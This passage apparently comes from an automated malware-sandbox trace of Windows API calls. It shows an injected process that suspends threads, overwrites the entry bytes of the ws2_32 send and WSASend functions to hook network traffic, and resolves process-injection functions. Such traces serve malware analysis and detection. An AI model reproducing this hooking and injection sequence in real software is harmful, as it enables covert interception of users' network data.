(hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.217] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.218] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.218] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.218] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.219] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.219] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.219] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.220] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.220] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.220] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.221] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.266] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x734) returned 0x8c [0171.266] SuspendThread (hThread=0x8c) returned 0x0 [0171.266] CloseHandle (hObject=0x8c) returned 1 [0171.266] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9b0) returned 0x8c [0171.266] SuspendThread (hThread=0x8c) returned 0x0 [0171.266] CloseHandle (hObject=0x8c) returned 1 [0171.291] CloseHandle (hObject=0x88) returned 1 [0171.291] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0171.291] GetProcAddress (hModule=0x75bc0000, lpProcName="send") returned 0x75bc6f01 [0171.291] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x74224 | out: lpflOldProtect=0x74224*=0x20) returned 1 [0171.292] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x80000 [0171.292] RtlMoveMemory (in: Destination=0x80000, Source=0x75bc6f01, Length=0x5 | out: Destination=0x80000) [0171.292] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x74224 | out: lpflOldProtect=0x74224*=0x40) returned 1 [0171.336] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0171.336] GetProcAddress (hModule=0x75bc0000, lpProcName="WSASend") returned 0x75bc4406 [0171.336] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x74224 | out: lpflOldProtect=0x74224*=0x20) returned 1 [0171.336] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x90000 [0171.336] RtlMoveMemory (in: Destination=0x90000, Source=0x75bc4406, Length=0x5 | out: Destination=0x90000) [0171.339] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x74224 | out: lpflOldProtect=0x74224*=0x40) returned 1 [0171.343] GetCurrentProcessId () returned 0x688 [0171.343] GetCurrentThreadId () returned 0xafc [0171.343] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0171.345] Thread32First (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.345] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.345] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.346] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.346] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.346] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.346] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.347] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.347] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.347] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.347] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.348] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.348] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.348] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.349] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.349] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.349] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.349] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.350] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.350] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.350] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.350] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.351] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.351] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.351] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.352] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.352] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.352] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.352] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.353] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.353] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.353] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.353] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.354] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.354] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.354] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.355] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.355] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.355] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.355] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.356] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.356] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.356] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.356] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.357] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.357] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.357] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.358] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.358] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.358] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.358] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.359] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.359] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.359] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.360] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.360] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.360] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.361] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.361] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.361] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.362] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.362] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.362] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.362] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.363] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.363] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.363] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.363] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.364] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.364] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.364] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.365] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.365] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.365] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.367] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.367] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.367] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.368] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.368] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.368] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.368] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.369] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.369] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.369] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.369] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.370] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.370] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.370] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.371] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.371] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.371] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.371] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.372] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.372] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.372] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.372] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.373] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.373] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.373] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.374] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.374] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.374] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.437] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.437] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.437] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.438] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.438] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.438] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.439] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.439] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.439] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.439] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.440] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.440] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.440] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.440] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.441] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.441] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.441] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.442] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.442] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.442] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.442] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.443] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.443] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.443] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.443] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.444] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.444] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.444] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.445] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.445] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.445] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.445] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.446] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.446] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.446] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.446] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.447] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.447] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.447] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.448] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.448] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.448] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.448] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.449] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.449] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.449] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.450] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.450] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.450] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.450] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.451] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.451] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.451] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.451] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.452] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.452] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.452] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.453] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.453] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.453] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.453] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.454] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.454] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.454] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.455] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.455] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.455] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.455] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.456] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.456] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.456] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.456] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.457] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.457] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.457] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.458] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.458] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.458] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.458] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.459] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.459] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.459] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.459] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.460] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.460] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.460] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.461] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.461] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.461] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.461] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.462] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.462] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.462] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.463] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.463] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.463] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.463] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.464] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.464] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.464] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.464] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.465] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.465] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.465] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.466] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.466] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.466] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.466] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.467] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.467] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.467] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.467] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.468] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.468] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.468] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.469] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.469] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.469] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.471] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.471] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.471] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.471] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.472] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.472] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.472] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.473] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.473] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.473] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.473] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.474] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.474] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.474] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.475] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.475] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.475] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.475] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.476] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.476] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.476] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.476] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.477] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.477] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.477] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.478] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.478] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.478] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.479] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.479] Thread32Next (hSnapshot=0x88, lpte=0x232fe8c) returned 1 [0171.496] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x734) returned 0x8c [0171.496] ResumeThread (hThread=0x8c) returned 0x1 [0171.496] CloseHandle (hObject=0x8c) returned 1 [0171.496] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9b0) returned 0x8c [0171.496] ResumeThread (hThread=0x8c) returned 0x1 [0171.496] CloseHandle (hObject=0x8c) returned 1 [0171.545] CloseHandle (hObject=0x88) returned 1 [0171.545] VirtualQuery (in: lpAddress=0x5f0a28, lpBuffer=0x232fe80, dwLength=0x1c | out: lpBuffer=0x232fe80*(BaseAddress=0x5f0000, AllocationBase=0x5d0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0171.545] GetProcessHeap () returned 0x5d0000 [0171.545] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5f0a28 | out: hHeap=0x5d0000) returned 1 [0171.545] VirtualQuery (in: lpAddress=0x5f0918, lpBuffer=0x232fe80, dwLength=0x1c | out: lpBuffer=0x232fe80*(BaseAddress=0x5f0000, AllocationBase=0x5d0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0171.545] GetProcessHeap () returned 0x5d0000 [0171.545] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5f0918 | out: hHeap=0x5d0000) returned 1 [0171.546] RtlExitUserThread (Status=0x0) Process: id = "32" image_name = "zoodiffer.exe" filename = "c:\\program files (x86)\\adobe\\zoodiffer.exe" page_root = "0x65f2b000" os_pid = "0x7f0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "16" os_parent_pid = "0x958" cmd_line = "\"C:\\Program Files (x86)\\Adobe\\zoodiffer.exe\" " cur_dir = "C:\\Program Files (x86)\\Adobe\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 258 os_tid = 0x9ac Thread: id = 259 os_tid = 0x7b4 Thread: id = 260 os_tid = 0xb20 [0171.057] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0171.057] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0171.057] GetProcAddress (hModule=0x76c20000, lpProcName="ReadProcessMemory") returned 0x76c4cfcc [0171.057] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32Next") returned 0x76cb5c3f [0171.057] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0171.057] GetProcAddress (hModule=0x76c20000, lpProcName="ExitThread") returned 0x7718d598 [0171.058] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0171.058] GetProcAddress (hModule=0x76c20000, lpProcName="RtlMoveMemory") returned 0x77193c40 [0171.058] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0171.058] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiA") returned 0x76c33e8e [0171.058] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0171.058] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0171.058] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0171.058] GetProcAddress (hModule=0x76c20000, lpProcName="OpenThread") returned 0x76c41248 [0171.058] GetProcAddress (hModule=0x76c20000, lpProcName="Process32Next") returned 0x76c588a4 [0171.058] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0171.058] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleA") returned 0x76c31245 [0171.058] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexA") returned 0x76c34c6b [0171.058] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0171.059] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0171.059] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0171.059] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0171.059] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0171.059] GetProcAddress (hModule=0x76c20000, lpProcName="WriteProcessMemory") returned 0x76c4d9e0 [0171.059] GetProcAddress (hModule=0x76c20000, lpProcName="SuspendThread") returned 0x76c57d7e [0171.059] GetProcAddress (hModule=0x76c20000, lpProcName="ResumeThread") returned 0x76c343ef [0171.059] GetProcAddress (hModule=0x76c20000, lpProcName="RtlZeroMemory") returned 0x77193c10 [0171.059] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32First") returned 0x76cb5b93 [0171.059] GetProcAddress (hModule=0x76c20000, lpProcName="CreateRemoteThread") returned 0x76cb416b [0171.059] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcess") returned 0x76c31986 [0171.059] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0171.059] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0171.059] GetProcAddress (hModule=0x76c20000, lpProcName="Process32First") returned 0x76c58ae7 [0171.060] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0171.060] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0171.060] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualQuery") returned 0x76c3445a [0171.060] GetProcAddress 